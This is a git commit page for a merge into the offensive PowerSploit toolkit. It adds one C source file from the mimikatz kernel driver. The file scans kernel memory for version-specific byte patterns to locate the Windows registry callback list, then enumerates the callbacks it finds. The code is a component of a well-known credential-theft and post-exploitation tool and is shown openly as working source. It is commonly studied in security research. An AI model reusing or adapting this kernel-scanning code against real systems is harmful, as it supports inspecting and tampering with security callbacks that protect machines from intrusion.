Merge pull request #15 from clymb3r/master

Adding GitIgnore, adding Invoke-NinjaCopy and Invoke-Mimikatz
author: Matt Graeber <mattgraeber@gmail.com> 2013-10-01 14:29:34 -0700
committer: Matt Graeber <mattgraeber@gmail.com> 2013-10-01 14:29:34 -0700
commit: 6ad050fe7a54ae7c47fda4505043df8efd82bc2e (patch)
tree: 9c99d9aa042a4752991cfe8f0069c9a4823c8d42 /Exfiltration/mimikatz-1.0/driver/notify_reg.c
parent: 23850a6337bf79d02f68912e49df12f3cde4a8dd (diff)
parent: 59cd18360764af6e6133ad11ec9cd8295372e587 (diff)
download: PowerSploit-6ad050fe7a54ae7c47fda4505043df8efd82bc2e.tar.gz
PowerSploit-6ad050fe7a54ae7c47fda4505043df8efd82bc2e.zip
1 files changed, 137 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/driver/notify_reg.c b/Exfiltration/mimikatz-1.0/driver/notify_reg.c
new file mode 100644
index 0000000..843cfba
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/driver/notify_reg.c
@@ -0,0 +1,137 @@
+#include "notify_reg.h"
+
+ULONG * CmpCallBackCount		= NULL;
+PVOID * CmpCallBackVector		= NULL;
+PLIST_ENTRY CallbackListHead	= NULL;
+
+NTSTATUS kListNotifyRegistry(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
+{
+	NTSTATUS status;
+	ULONG i;
+	PKIWI_CALLBACK monCallBack;
+	PLIST_ENTRY maListe;
+	PKIWI_REGISTRY6_CALLBACK monCallBack6;
+
+	*ppszDestEnd = pszDest; *pcbRemaining= cbDest;
+	status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyRegistry\n\n");
+	if(NT_SUCCESS(status))
+	{
+		status = getNotifyRegistryRoutine();
+		if(NT_SUCCESS(status))
+		{
+			if(INDEX_OS < INDEX_VISTA)
+			{
+				for(i = 0; (i < *CmpCallBackCount) && NT_SUCCESS(status) ; i++)
+				{
+					monCallBack = (PKIWI_CALLBACK) KIWI_mask3bits(CmpCallBackVector[i]);
+					if(monCallBack != NULL)
+					{
+						status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i);
+						if(NT_SUCCESS(status))
+						{
+							status = getModuleFromAddr((ULONG_PTR) monCallBack->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
+							if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
+							{
+								status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
+									L" - cookie %#.I64x\n", *(monCallBack->opt_cookie)
+								);
+							}
+						}
+					}
+				}
+			}
+			else
+			{
+				for(maListe = CallbackListHead->Flink, i = 0; (maListe != CallbackListHead) && NT_SUCCESS(status) ; maListe = maListe->Flink, i++)
+				{
+					monCallBack6 = (PKIWI_REGISTRY6_CALLBACK) (((ULONG_PTR) maListe) + sizeof(LIST_ENTRY) + 2*((INDEX_OS < INDEX_7) ? sizeof(PVOID) : sizeof(ULONG)));
+					status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i);
+					if(NT_SUCCESS(status))
+					{
+						status = getModuleFromAddr((ULONG_PTR) monCallBack6->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
+						if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
+						{
+							status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
+								L" - alt %wZ - cookie %#.I64x\n", &(monCallBack6->altitude), monCallBack6->cookie);
+						}
+					}
+				}
+			}
+		}
+	}
+	return status;
+}
+
+NTSTATUS getNotifyRegistryRoutine()
+{
+	NTSTATUS retour = STATUS_NOT_FOUND;
+	#ifdef _M_X64
+		UCHAR PTRN_WNT5_Vector[]= {0x4c, 0x8d, 0x3d};
+		UCHAR PTRN_WNT5_Count[]	= {0x0f, 0xc1, 0x05};
+		
+		UCHAR PTRN_WN60_Head[]	= {0x48, 0x8b, 0xf0, 0x48};
+		LONG OFFS_WN60_Head		= -9;
+		UCHAR PTRN_WALL_Head[]	= {0x48, 0x8b, 0xf8, 0x48};
+		LONG OFFS_WALL_Head		= -9;
+	#elif defined _M_IX86
+		UCHAR PTRN_WNT5_Vector[]= {0x53, 0x56, 0x57, 0xbb};
+		UCHAR PTRN_WNT5_Count[]	= {0xff, 0xb9};
+		
+		UCHAR PTRN_WN60_Head[]	= {0x8b, 0xcb, 0xe8};
+		LONG OFFS_WN60_Head		= 12;
+		UCHAR PTRN_WN61_Head[]	= {0x8b, 0xc7, 0xe8};
+		LONG OFFS_WN61_Head		= -4;
+		UCHAR PTRN_WIN8_Head[]	= {0x53, 0x8d, 0x55};
+		LONG OFFS_WIN8_Head		= -4;
+	#endif
+	PUCHAR refDebut = (PUCHAR) CmUnRegisterCallback, refFin = refDebut + PAGE_SIZE;
+	PUCHAR pattern = NULL; SIZE_T taille = 0; LONG offsetTo = 0;
+	
+	if((CmpCallBackVector && CmpCallBackCount) || CallbackListHead)
+	{
+		retour = STATUS_SUCCESS;
+	}
+	else
+	{
+		if(INDEX_OS < INDEX_VISTA)	
+		{
+			retour = genericPointerSearch((PUCHAR *) &CmpCallBackVector, refDebut, refFin, PTRN_WNT5_Vector, sizeof(PTRN_WNT5_Vector), sizeof(PTRN_WNT5_Vector));
+			if(NT_SUCCESS(retour))
+			{
+				retour = genericPointerSearch((PUCHAR *) &CmpCallBackCount, refDebut, refFin, PTRN_WNT5_Count, sizeof(PTRN_WNT5_Count), sizeof(PTRN_WNT5_Count));
+			}
+		}
+		else
+		{
+			if(INDEX_OS < INDEX_7)
+			{
+				pattern = PTRN_WN60_Head;
+				taille  = sizeof(PTRN_WN60_Head);
+				offsetTo= OFFS_WN60_Head;
+			}
+			else
+			{
+				#ifdef _M_X64
+					pattern = PTRN_WALL_Head;
+					taille  = sizeof(PTRN_WALL_Head);
+					offsetTo= OFFS_WALL_Head;
+				#elif defined _M_IX86
+					if(INDEX_OS < INDEX_8)
+					{
+						pattern = PTRN_WN61_Head;
+						taille  = sizeof(PTRN_WN61_Head);
+						offsetTo= OFFS_WN61_Head;
+					}
+					else
+					{
+						pattern = PTRN_WIN8_Head;
+						taille  = sizeof(PTRN_WIN8_Head);
+						offsetTo= OFFS_WIN8_Head;
+					}
+				#endif
+			}
+			retour = genericPointerSearch((PUCHAR *) &CallbackListHead, refDebut, refFin, pattern, taille, offsetTo);
+		}
+	}
+	return retour;
+}
author	Matt Graeber <mattgraeber@gmail.com>	2013-10-01 14:29:34 -0700
committer	Matt Graeber <mattgraeber@gmail.com>	2013-10-01 14:29:34 -0700
commit	6ad050fe7a54ae7c47fda4505043df8efd82bc2e (patch)
tree	9c99d9aa042a4752991cfe8f0069c9a4823c8d42 /Exfiltration/mimikatz-1.0/driver/notify_reg.c
parent	23850a6337bf79d02f68912e49df12f3cde4a8dd (diff)
parent	59cd18360764af6e6133ad11ec9cd8295372e587 (diff)
download	PowerSploit-6ad050fe7a54ae7c47fda4505043df8efd82bc2e.tar.gz PowerSploit-6ad050fe7a54ae7c47fda4505043df8efd82bc2e.zip